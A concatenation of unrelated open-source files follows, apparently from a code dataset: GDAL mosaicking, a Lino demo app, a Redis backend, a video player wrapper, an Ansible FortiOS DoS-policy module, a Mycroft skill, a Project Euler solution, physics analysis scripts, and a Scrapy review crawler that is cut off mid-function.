print('Creating mosaic...')
targetvrt = targetfile.replace(".tif", ".vrt")
cmd_mosaic = "gdalbuildvrt %s %s" % (targetvrt, ' '.join(sys.argv[3:]))
os.system(cmd_mosaic)
# Now translate the mosaic to an actual GeoTiff
# Cmd format: gdal_translate -of GTiff mosaic.vrt output.tif
mergedfile = sys.argv[2].replace(".wgs84.tif", ".merged.wgs84.vrt")
cmd_merge = "gdal_translate -a_srs \"+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs\" -of GTiff %s %s" % (targetvrt, targetfile)
os.system(cmd_merge)
# Now remove the .vrt
os.remove(targetvrt)
print('Merge finished...')
elif action == "reproject":
print('Reprojecting...')
else:
print('No valid action provided.')
| gpl-3.0 | -5,237,369,659,882,149,000 | 35.65 | 182 | 0.697817 | false |
MaxTyutyunnikov/lino | obsolete/src/lino/apps/pizzeria/services.py | 1 | 2711 | ## Copyright 2003-2007 Luc Saffre
## This file is part of the Lino project.
## Lino is free software; you can redistribute it and/or modify it
## under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
## Lino is distributed in the hope that it will be useful, but WITHOUT
## ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
## or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
## License for more details.
## You should have received a copy of the GNU General Public License
## along with Lino; if not, write to the Free Software Foundation,
## Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from lino.adamo.ddl import *
from lino.adamo.datatypes import itod
from lino.apps.pizzeria import pizzeria
#from lino.apps.pizzeria.pizzeria import Orders, Products, OrderLines, Customers
class Service(pizzeria.Product):
tableName="Services"
def initTable(self,table):
pizzeria.Product.initTable(self,table)
table.addField('responsible',STRING)
class ServicesReport(DataReport):
leadTable=Service
class MyPizzeriaSchema(pizzeria.PizzeriaSchema):
tableClasses = (pizzeria.Product,
Service,
pizzeria.Customer,
pizzeria.Order, pizzeria.OrderLine)
class MyPizzeriaMain(pizzeria.PizzeriaMain):
schemaClass=MyPizzeriaSchema
"""
Welcome to MyPizzeria, a customization of the most simple Lino demo
application. Note that this application is for demonstration purposes
only.
"""
def setupMenu(self):
m = self.addMenu("my","&My Pizzeria")
self.addReportItem(
m,"services",ServicesReport,label="&Services")
pizzeria.PizzeriaMain.setupMenu(self)
class MyPizzeria(pizzeria.Pizzeria):
name="My Pizzeria"
mainFormClass=MyPizzeriaMain
def populate(dbc):
pizzeria.populate(dbc)
SERV = dbc.query(Service)
CUST = dbc.query(pizzeria.Customer)
ORDERS = dbc.query(pizzeria.Order)
PROD = dbc.query(pizzeria.Product)
s1 = SERV.appendRow(name="bring home",price=1)
s2 = SERV.appendRow(name="organize party",price=100)
c3 = CUST.appendRow(name="Bernard")
o1 = ORDERS.appendRow(customer=c3,date=itod(20040318))
q = o1.lines()
q.appendRow(product=PROD.peek(1),qty=1)
q.appendRow(product=s1,qty=1)
o2 = ORDERS.appendRow(customer=CUST.peek(1),date=itod(20040319))
q = o2.lines()
q.appendRow(product=PROD.peek(1),qty=2)
q.appendRow(product=PROD.peek(2),qty=3)
o1.register()
o2.register()
| gpl-3.0 | 4,601,415,181,698,994,000 | 27.536842 | 80 | 0.694947 | false |
cwoebker/relo | relo/core/backend/redisdb.py | 1 | 1633 | #!/usr/bin/env python
# encoding: utf-8
import sys
import os
import redis
from relo.core.log import logger
dirname = os.path.dirname(os.path.abspath(__file__))
up_dir = os.path.dirname(dirname)
sys.path.append(up_dir)
from relo.core.interfaces import Backend
class REDISDB(Backend):
name = "redis"
expiretime = 60*60*24*7 # for a week
def init(self):
logger.debug("Connecting to Redis")
self.connection = redis.StrictRedis(host='localhost', port=6379, db=12)
def check(self):
logger.debug("check not needed with redis")
def load(self):
logger.debug("Redis auto loads")
def save(self):
self.connection.save()
def addProject(self, key, project, type):
project_string = project + ":::" + type
self.connection.sadd(key, project_string)
def listProjects(self, key):
members = self.connection.smembers(key)
returnList = []
for member in members:
returnList.append(member.split(":::"))
return returnList
def addMeta(self, path, modified, hash, size, type):
pipe = self.connection.pipeline()
pipe.hmset(path, dict(modified=modified, hash=hash, size=size, type=type)).expire(path, self.expiretime).execute()
del pipe
def addSet(self, key, value):
self.connection.sadd(key, value)
def getSet(self, key):
return self.connection.smembers(key)
def get(self, key, field):
return self.connection.hget(key, field)
def find(self, key):
return self.connection.keys(pattern='*'+key+'*')
def end(self):
self.connection.shutdown() | bsd-3-clause | -2,834,990,471,099,505,700 | 32.346939 | 122 | 0.644213 | false |
KanoComputing/kano-video | kano_video/logic/player.py | 1 | 4469 | # player.py
#
# Copyright (C) 2014-2016 Kano Computing Ltd.
# License: http://www.gnu.org/licenses/gpl-2.0.txt GNU GPL v2
#
# Manages playing of videos
import sys
import os
from kano.utils import is_installed, run_bg, get_volume, percent_to_millibel
from kano.logging import logger
from .youtube import get_video_file_url
# Support for Gtk versions 3 and 2
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
import playudev
subtitles_dir = '/usr/share/kano-media/videos/subtitles'
omxplayer_present = is_installed('omxplayer')
vlc_present = is_installed('vlc')
if not omxplayer_present and not vlc_present:
sys.exit('Neither vlc nor omxplayer is installed!')
def play_video(_button=None, video_url=None, localfile=None, subtitles=None,
init_threads=True, keyboard_engulfer=True):
"""
Plays a local or remote video using the optimal video player found.
Handles sound settings and subtitles.
"""
if video_url:
logger.info('Getting video url: {}'.format(video_url))
success, data = get_video_file_url(video_url)
if not success:
logger.error('Error with getting YouTube url: {}'.format(data))
if _button:
_button.set_sensitive(True)
return
link = data
elif localfile:
link = localfile
else:
if _button:
_button.set_sensitive(True)
return
logger.info('Launching player...')
if omxplayer_present:
volume_percent = get_volume()
volume_str = '--vol {}'.format(
percent_to_millibel(volume_percent, raspberry_mod=True))
if not subtitles or not os.path.isfile(subtitles):
subtitles = None
if localfile:
filename = os.path.basename(localfile)
filename = os.path.splitext(filename)[0]
fullpath = os.path.join(subtitles_dir, filename + '.srt')
if os.path.exists(fullpath):
subtitles = fullpath
if not subtitles:
subtitles = os.path.join(subtitles_dir, 'controls.srt')
subtitles_str = ''
try:
from kano_settings.system.display import is_overscan
if not is_overscan():
subtitles_str = '--subtitle "{subtitles}" ' \
'--font "/usr/share/fonts/kano/bariol/Bariol_Regular.otf" --font-size 35 ' \
'--align center'.format(subtitles=subtitles)
except Exception:
pass
# Set the audio output between HDMI or Jack. Default is HDMI since it's the
# safest route given the PiHat lib getting destabilised if Jack is used.
audio_out = 'hdmi'
try:
from kano_settings.system.audio import is_HDMI
if not is_HDMI():
audio_out = 'local'
except Exception:
pass
player_cmd = 'omxplayer -o {audio_out} {volume_str} {subtitles} -b "{link}"' \
''.format(
audio_out=audio_out,
link=link,
volume_str=volume_str,
subtitles=subtitles_str
)
else:
player_cmd = 'vlc -f --no-video-title-show ' \
'"{link}"'.format(link=link)
# Play with keyboard interaction coming from udev directly
# so that we do not lose focus and capture all key presses
playudev.run_player(player_cmd, init_threads=init_threads,
keyboard_engulfer=keyboard_engulfer)
# finally, enable the button back again
if _button:
_button.set_sensitive(True)
def get_centred_coords(width, height):
"""
Calculates the top-left and bottom-right coordinates for a given window
size to be centred
"""
from gi.repository import Gdk
taskbar_height = 44
monitor = {
'width': Gdk.Screen.width(),
'height': Gdk.Screen.height(),
}
x1 = (monitor['width'] - width) / 2
x2 = x1 + width
y1 = ((monitor['height'] - taskbar_height) - height) / 2
y2 = y1 + height
return x1, y1, x2, y2
def stop_videos(_button=None):
"""
Kills all videos that are currently playing
# TODO: Stop only videos which are managed by this module
"""
if omxplayer_present:
run_bg('killall omxplayer.bin')
else:
run_bg('killall vlc')
| gpl-2.0 | 4,278,216,597,469,036,500 | 28.596026 | 96 | 0.590065 | false |
amenonsen/ansible | lib/ansible/modules/network/fortios/fortios_firewall_DoS_policy6.py | 1 | 16272 | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_firewall_DoS_policy6
short_description: Configure IPv6 DoS policies in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS device by allowing the
user to set and modify firewall feature and DoS_policy6 category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
version_added: 2.9
state:
description:
- Indicates whether to create or remove the object.
type: str
choices:
- present
- absent
version_added: 2.9
firewall_DoS_policy6:
description:
- Configure IPv6 DoS policies.
default: null
type: dict
suboptions:
anomaly:
description:
- Anomaly name.
type: list
suboptions:
action:
description:
- Action taken when the threshold is reached.
type: str
choices:
- pass
- block
log:
description:
- Enable/disable anomaly logging.
type: str
choices:
- enable
- disable
name:
description:
- Anomaly name.
required: true
type: str
quarantine:
description:
- Quarantine method.
type: str
choices:
- none
- attacker
quarantine_expiry:
description:
- Duration of quarantine. (Format ###d##h##m, minimum 1m, maximum 364d23h59m, default = 5m). Requires quarantine set to attacker.
type: str
quarantine_log:
description:
- Enable/disable quarantine logging.
type: str
choices:
- disable
- enable
status:
description:
- Enable/disable this anomaly.
type: str
choices:
- disable
- enable
threshold:
description:
- Anomaly threshold. Number of detected instances per minute that triggers the anomaly action.
type: int
threshold(default):
description:
- Number of detected instances per minute which triggers action (1 - 2147483647, default = 1000). Note that each anomaly has a
different threshold value assigned to it.
type: int
comments:
description:
- Comment.
type: str
dstaddr:
description:
- Destination address name from available addresses.
type: list
suboptions:
name:
description:
- Address name. Source firewall.address6.name firewall.addrgrp6.name.
required: true
type: str
interface:
description:
- Incoming interface name from available interfaces. Source system.zone.name system.interface.name.
type: str
policyid:
description:
- Policy ID.
required: true
type: int
service:
description:
- Service object from available options.
type: list
suboptions:
name:
description:
- Service name. Source firewall.service.custom.name firewall.service.group.name.
required: true
type: str
srcaddr:
description:
- Source address name from available addresses.
type: list
suboptions:
name:
description:
- Service name. Source firewall.address6.name firewall.addrgrp6.name.
required: true
type: str
status:
description:
- Enable/disable this policy.
type: str
choices:
- enable
- disable
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Configure IPv6 DoS policies.
fortios_firewall_DoS_policy6:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
state: "present"
firewall_DoS_policy6:
anomaly:
-
action: "pass"
log: "enable"
name: "default_name_6"
quarantine: "none"
quarantine_expiry: "<your_own_value>"
quarantine_log: "disable"
status: "disable"
threshold: "11"
threshold(default): "12"
comments: "<your_own_value>"
dstaddr:
-
name: "default_name_15 (source firewall.address6.name firewall.addrgrp6.name)"
interface: "<your_own_value> (source system.zone.name system.interface.name)"
policyid: "17"
service:
-
name: "default_name_19 (source firewall.service.custom.name firewall.service.group.name)"
srcaddr:
-
name: "default_name_21 (source firewall.address6.name firewall.addrgrp6.name)"
status: "enable"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
ssl_verify = data['ssl_verify']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password, verify=ssl_verify)
def filter_firewall_DoS_policy6_data(json):
option_list = ['anomaly', 'comments', 'dstaddr',
'interface', 'policyid', 'service',
'srcaddr', 'status']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def underscore_to_hyphen(data):
if isinstance(data, list):
for elem in data:
elem = underscore_to_hyphen(elem)
elif isinstance(data, dict):
new_data = {}
for k, v in data.items():
new_data[k.replace('_', '-')] = underscore_to_hyphen(v)
data = new_data
return data
def firewall_DoS_policy6(data, fos):
vdom = data['vdom']
state = data['state']
firewall_DoS_policy6_data = data['firewall_DoS_policy6']
filtered_data = underscore_to_hyphen(filter_firewall_DoS_policy6_data(firewall_DoS_policy6_data))
if state == "present":
return fos.set('firewall',
'DoS-policy6',
data=filtered_data,
vdom=vdom)
elif state == "absent":
return fos.delete('firewall',
'DoS-policy6',
mkey=filtered_data['policyid'],
vdom=vdom)
def is_successful_status(status):
return status['status'] == "success" or \
status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_firewall(data, fos):
if data['firewall_DoS_policy6']:
resp = firewall_DoS_policy6(data, fos)
return not is_successful_status(resp), \
resp['status'] == "success", \
resp
def main():
fields = {
"host": {"required": False, "type": "str"},
"username": {"required": False, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"ssl_verify": {"required": False, "type": "bool", "default": True},
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"firewall_DoS_policy6": {
"required": False, "type": "dict", "default": None,
"options": {
"anomaly": {"required": False, "type": "list",
"options": {
"action": {"required": False, "type": "str",
"choices": ["pass", "block"]},
"log": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"name": {"required": True, "type": "str"},
"quarantine": {"required": False, "type": "str",
"choices": ["none", "attacker"]},
"quarantine_expiry": {"required": False, "type": "str"},
"quarantine_log": {"required": False, "type": "str",
"choices": ["disable", "enable"]},
"status": {"required": False, "type": "str",
"choices": ["disable", "enable"]},
"threshold": {"required": False, "type": "int"},
"threshold(default)": {"required": False, "type": "int"}
}},
"comments": {"required": False, "type": "str"},
"dstaddr": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}},
"interface": {"required": False, "type": "str"},
"policyid": {"required": True, "type": "int"},
"service": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}},
"srcaddr": {"required": False, "type": "list",
"options": {
"name": {"required": True, "type": "str"}
}},
"status": {"required": False, "type": "str",
"choices": ["enable", "disable"]}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
legacy_mode = 'host' in module.params and module.params['host'] is not None and \
'username' in module.params and module.params['username'] is not None and \
'password' in module.params and module.params['password'] is not None
if not legacy_mode:
if module._socket_path:
connection = Connection(module._socket_path)
fos = FortiOSHandler(connection)
is_error, has_changed, result = fortios_firewall(module.params, fos)
else:
module.fail_json(**FAIL_SOCKET_MSG)
else:
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
login(module.params, fos)
is_error, has_changed, result = fortios_firewall(module.params, fos)
fos.logout()
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| gpl-3.0 | 4,463,918,872,802,416,600 | 33.621277 | 157 | 0.505101 | false |
ssmruthi/mycroft-core | mycroft/skills/stop/__init__.py | 1 | 1465 | # Copyright 2016 Mycroft AI, Inc.
#
# This file is part of Mycroft Core.
#
# Mycroft Core is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Mycroft Core is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mycroft Core. If not, see <http://www.gnu.org/licenses/>.
from adapt.intent import IntentBuilder
from os.path import dirname, join
from mycroft.messagebus.message import Message
from mycroft.skills.core import MycroftSkill
from mycroft.util.log import getLogger
__author__ = 'jdorleans'
LOGGER = getLogger(__name__)
class StopSkill(MycroftSkill):
def __init__(self):
super(StopSkill, self).__init__(name="StopSkill")
def initialize(self):
# TODO - To be generalized in MycroftSkill
intent = IntentBuilder("StopIntent").require("StopKeyword").build()
self.register_intent(intent, self.handle_intent)
def handle_intent(self, event):
self.emitter.emit(Message("mycroft.stop"))
def stop(self):
pass
def create_skill():
return StopSkill()
| gpl-3.0 | 6,920,087,115,239,575,000 | 29.520833 | 75 | 0.724232 | false |
fbcom/project-euler | 072_counting_fractions.py | 1 | 1188 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# A Solution to "Counting fractions" – Project Euler Problem No. 72
# by Florian Buetow
#
# Sourcecode: https://github.com/fbcom/project-euler
# Problem statement: https://projecteuler.net/problem=72
def get_distinct_prime_factors(n):
ret = []
if n > 1:
for d in [2] + range(3, 1+int(n**0.5), 2):
if n % d == 0:
ret.append(d)
while n % d == 0:
n = n / d
if n <= 1:
break
if n > 1:
ret.append(n)
return ret
def phi(n):
# Euler's totient function:
# phi(n) := counts how many numbers k < n have gcd(n,k) = 1
ret = n
for p in get_distinct_prime_factors(n):
ret = ret - ret / p
return ret
def count_reduced_proper_fractions(limit):
# turns out the solution is equal to the sum of phi(i) for i in [2,...,limit]
ret = 0
for n in range(2, limit+1):
ret += phi(n)
return ret
# Testcase
assert count_reduced_proper_fractions(8) == 21, "Testcase failed"
# Solve
limit = 1000*1000 # one million
solution = count_reduced_proper_fractions(limit)
print "Solution:", solution
| mit | -8,231,899,438,116,633,000 | 23.708333 | 81 | 0.572513 | false |
aolindahl/epicea | straighten_lines.py | 1 | 4479 | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 29 15:34:36 2015
@author: antlin
"""
import numpy as np
import matplotlib.pyplot as plt
import lmfit
import epicea
import electron_calibration_data
import plt_func
line_model = epicea.electron_calibration_helper.n_line_fit_model
line = 'voigt'
data_list = electron_calibration_data.get_data_in_list('357', True)
r_axis_mm = np.linspace(0, 25, 2**9+1)[1::2]
th_axis_rad = np.linspace(0, 2*np.pi, 2**9+1)[1::2]
th_limits = epicea.limits_from_centers(th_axis_rad)
# data = data_list[0]
for data in data_list:
r_th_img = data.get_e_rth_image(r_axis_mm, th_axis_rad)[0]
r_proj = r_th_img.sum(axis=0)
proj_params_initial = epicea.electron_calibration_helper.start_params(
r_axis_mm, r_proj, n_lines=2)
proj_result = lmfit.minimize(line_model,
proj_params_initial,
args=(r_axis_mm, r_proj),
kws={'line_type': line})
r_th_fig = plt_func.figure_wrapper('theta - r ' + data.name())
ax_origaninl = plt.subplot(221)
plt_func.imshow_wrapper(r_th_img,
r_axis_mm, th_axis_rad,
kw_args={'aspect': 'auto'})
plt_func.colorbar_wrapper()
ax_origaninl.autoscale(False)
plt.subplot(223)
plt.plot(r_axis_mm, r_proj)
plt.plot(r_axis_mm, line_model(proj_result.params, r_axis_mm,
line_type=line), '--')
centers = (r_th_img * r_axis_mm).sum(axis=1) / r_th_img.sum(axis=1)
# radial_factors = centers.mean()/centers
# Find the center of the first line
low_radius_centers = np.empty_like(centers)
for i_th in range(len(th_axis_rad)):
y = r_th_img[i_th, :]
i_min = r_axis_mm.searchsorted(centers[i_th])
while y[i_min] > y[i_min - 1]:
i_min -= 1
while y[i_min] > y[i_min+1]:
i_min += 1
I_low_radius = (((centers[i_th] - 3) <= r_axis_mm) &
(r_axis_mm <= centers[i_th]))
low_radius_centers[i_th] = ((r_th_img[i_th, I_low_radius] *
r_axis_mm[I_low_radius]).sum() /
r_th_img[i_th, I_low_radius].sum())
radial_factors = low_radius_centers.mean() / low_radius_centers
ax_origaninl.plot(centers, th_axis_rad, 'm')
ax_origaninl.plot(low_radius_centers, th_axis_rad, 'c')
plt_func.figure_wrapper('centers ' + data.name())
plt.subplot(121)
plt.plot(centers, th_axis_rad, label='full center')
plt.plot(low_radius_centers, th_axis_rad, label='first center')
plt.title('center position')
plt_func.legend_wrapper()
plt.subplot(122)
plt.plot(radial_factors, th_axis_rad)
plt.title('r factors')
r = data.electrons.pos_r.value
th = data.electrons.pos_t.value
for i in range(len(th_axis_rad)):
selection = (th_limits[i] < th) & (th < th_limits[i+1])
r[selection] *= radial_factors[i]
r_th_img_corrected = epicea.center_histogram_2d(r, th, r_axis_mm,
th_axis_rad)
r_proj_corrected = r_th_img_corrected.sum(axis=0)
proj_corrected_params_initial = \
epicea.electron_calibration_helper.start_params(
r_axis_mm, r_proj_corrected, n_lines=2)
proj_corrected_result = lmfit.minimize(line_model,
proj_corrected_params_initial,
args=(r_axis_mm, r_proj_corrected),
kws={'line_type': line})
ax = r_th_fig.add_subplot(222)
plt.sca(ax)
plt_func.imshow_wrapper(r_th_img_corrected,
r_axis_mm, th_axis_rad,
kw_args={'aspect': 'auto'})
axis = plt.axis()
plt.plot(centers * radial_factors * np.ones_like(th_axis_rad),
th_axis_rad, 'm')
plt.plot(low_radius_centers.mean() * np.ones_like(th_axis_rad),
th_axis_rad, 'm')
plt_func.colorbar_wrapper()
plt.sca(r_th_fig.add_subplot(224))
plt.plot(r_axis_mm, r_proj_corrected)
plt.plot(r_axis_mm, line_model(proj_corrected_result.params, r_axis_mm,
line_type=line), '--')
plt_func.figure_wrapper('waterfall ' + data.name())
for i in range(len(th_axis_rad)):
plt.plot(r_axis_mm, r_th_img[i, :] + i * 20)
r_th_fig.tight_layout()
| gpl-2.0 | 8,085,153,324,896,847,000 | 35.120968 | 78 | 0.553472 | false |
siberianisaev/NeutronBarrel | Neutrons preprocessing/neutron_preprocessing.py | 1 | 5365 | import pandas as pd
import numpy as np
class ExpProcessing:
"""
class for preprocessed neutrons experiment data
"""
def __init__(self, counts_measured):
"""
Input : counts_measured - list (or any numpy convertible type)
Method creates a data frame with experimental counts, its errors,
normed values and its errors, mean and variance of the spectra
The data frame consists the next columns:
["bin", "count", "count_error", "probability", "probability_error",
"relative_error", "mean", "mean_error", "variance"]
"""
self._data = pd.DataFrame(columns=["bin", "count", "count_error", "probability",
"probability_error", "relative_error",
"mean", "mean_error", "variance"])
if not isinstance(counts_measured, np.ndarray):
try:
counts_measured = np.array(counts_measured)
except TypeError:
raise TypeError("count_measured must be an array or any numpy convertible type")
if counts_measured.size < 10:
counts_measured = np.pad(counts_measured, (0, 10 - counts_measured.size))
self._data["bin"] = [i for i in range(counts_measured.size)]
self._data["count"] = counts_measured
self._data["count_error"] = self.count_error_calculation()
self._data["relative_error"] = self._data["count_error"] / self._data["count"]
self._data["probability"], self._data["probability_error"] = self.normalization()
self._data["mean"] = self.mean_calculation()
self._data["mean_error"] = self.calculate_error_of_mean()
self._data["variance"] = self.variance_calculation()
def count_error_calculation(self):
"""
Method returns errors of experimental points s
s = sqrt(N) / sqrt(k), for k >= 1
s = sqrt(N) for k = 0
where N - counts of events with multiplicity k,
k - multiplicity of event
:return: array of absolute errors
"""
counts, bins = self._data["count"], self._data["bin"]
return [(N / k) ** 0.5 if k > 1 else N ** 0.5 for N, k in zip(counts, bins)]
def normalization(self):
"""
Method converts experimental points and errors to
probability of neutron emission and its errors
:return: two arrays: array of neutron emissions probability and its errors
"""
counts = self._data["count"]
count_errors = self._data["count_error"]
total = counts.sum()
return counts / total, count_errors / total
def mean_calculation(self):
"""
Method calculates mean value of experimental spectra
mean = total_neutrons / total_events
:return: mean value
"""
bins = self._data["bin"]
counts = self._data["count"]
return bins.dot(counts).sum() / counts.sum()
def variance_calculation(self):
"""
Method calculates variance of experimental spectra
variance = mean()**2 - mean(data**2)
:return: variance
"""
bins, counts = self._data["bin"], self._data["count"]
mx2 = (bins*bins).dot(counts).sum() / counts.sum()
m = self._data["mean"][0]
return mx2 - m * m
def get_data(self):
"""
Method returns the data in pandas.DataFrame format
:return: pandas.DataFrame object
"""
return self._data
def to_csv(self, filename=""):
"""
Method saves all calculated data to .csv file
with name 'filename'
:param filename: otional, name of file, default is 'neutrons+{current_date_and_time}.csv'
"""
if filename == "":
from datetime import datetime
now = datetime.now().strftime("%Y_%m_%d_%H_%M")
filename = f"neutrons_{now}.csv"
try:
self._data.to_csv(filename, index=False, header=True)
print(filename + " was saved successfully")
except FileNotFoundError as ex:
print("########\n# No such directory! Unsuccessful writing!\n########")
def calculate_error_of_mean(self):
"""
Method calculates the statistical error of measured mean value.
dM^2= (dN / E)^2 + (N * dE / E^2)^2
dM - mean error
N, dN - number of neutrons and its error (dN = sqrt(N))
E, dE - number of events and its error (dE = sqrt(E))
:return: dM, error of measured mean value
"""
total_events = self._data["count"].sum()
total_neutrons = self._data["count"].dot(self._data["bin"]).sum()
delta_events = total_events ** 0.5
delta_neutrons = total_neutrons ** 0.5
delta_mean_sq = (delta_neutrons / total_events)**2 + \
(total_neutrons * delta_events / total_events**2)**2
return delta_mean_sq ** 0.5
if __name__ == "__main__":
folder = "csv_05_2021/"
file = "Fm244" + ".csv"
a = [10, 20, 30]
pd.set_option('display.max_columns', None)
b = ExpProcessing(a)
print(b.get_data())
print(b.calculate_error_of_mean())
# b.to_csv(folder + file)
| mit | -5,235,752,218,111,256,000 | 38.954198 | 97 | 0.555266 | false |
Rafael-Cheng/MovieReviewCrawlers | broad crawler/MovieReview/MovieReview/spiders/MovieReviewSpider.py | 1 | 4028 | # -*- encoding:utf-8 -*-
import sys
import scrapy
from MovieReview.items import MoviereviewItem
from scrapy_redis.spiders import RedisSpider
from scrapy.http import Request, HtmlResponse
from scrapy.linkextractors import LinkExtractor
from scrapy.selector import Selector
from bs4 import BeautifulSoup
from obtain_date import obtain_date
reload(sys)
sys.setdefaultencoding('utf-8')
class MovieReviewSpider(scrapy.Spider):
name = "movie"
start_urls = ['http://maoyan.com/news?showTab=2']
# generate navigation page urls
def parse(self, response):
num_of_a = 0
leaf_divs = []
div_lenOfa = []
yield scrapy.Request(response.url, callback=self.extractLinks)
divs = response.xpath('//div')
# find leaf divs
for div in divs:
if len(div.xpath('.//div').extract()) == 0:
leaf_divs.append(div)
# calculate the number of a tags in a div
for div in leaf_divs:
div_lenOfa.append((div, len(div.xpath('.//a'))))
# sort by the number of tags
nav_divs = sorted(div_lenOfa, key=lambda tup:tup[1], reverse=True)
divs = response.xpath('./div').extract()
# locate page number tag
for div in nav_divs:
txt_in_a_tag = div[0].xpath('.//a/text()').extract()
if len(txt_in_a_tag) == 0:
continue
if txt_in_a_tag[-1] == '下一页':
url_next_page = div[0].xpath('.//a/@href').extract()[-1]
url = response.urljoin(url_next_page)
yield scrapy.Request(url, callback=self.parse)
def extractLinks(self, response):
div_lenDiv = []
comment_urls = []
divs = response.xpath('//div')
for div in divs:
div_lenDiv.append([div, len(div.xpath('./div'))])
sorted_divs = sorted(div_lenDiv, key=lambda div_lenDiv:div_lenDiv[1], reverse=True)
urls = sorted_divs[0][0].xpath('.//a/@href').extract()
for url in urls:
complete_url = response.urljoin(url)
if complete_url not in comment_urls:
comment_urls.append(complete_url)
for url in comment_urls:
yield scrapy.Request(url=url, callback=self.parsePage)
# parse specific pages
def parsePage(self, response):
item = MoviereviewItem()
div_lenOfP = []
try:
title = ''
title = ''.join(response.xpath('//h1/text()').extract_first().split())
except AttributeError as e:
if title == None or title == '':
return
url = str(response.url).replace('http://', '').\
replace('https://', '').replace('www.', '')
source = url.split('.')[0]
divs = response.xpath('//div')
for div in divs:
div_lenOfP.append([div, len(div.xpath('./p'))])
sorted_divs = sorted(div_lenOfP, key=lambda div_lenOfP:div_lenOfP[1], reverse=True)
content_div = sorted_divs[0][0]
content = ''.join(content_div.xpath('.//p/text()').extract())
# imgs = [x for x in content_div.xpath('.//img/@src').extract()]
# hashed_images = [hash(x) for x in imgs]
item['Url'] = response.url
item['Title'] = title
item['Source'] = source
item['Time'] = obtain_date(response)
# item['Images'] = str(hashed_images)
item['Content'] = content
# item['image_urls'] = imgs
yield item
def determineMain(div, tag):
maxTag = 0
bestDiv = div
divs = div.xpath('./div').extract()
for _div in divs:
retDiv, noOfTag = determineMain(_div, tag)
if noOfTag > maxTag:
maxTag = noOfTag
bestDiv = retDiv
search_string = './' + tag
noOfDiv = len(div.xpath(search_string).extract())
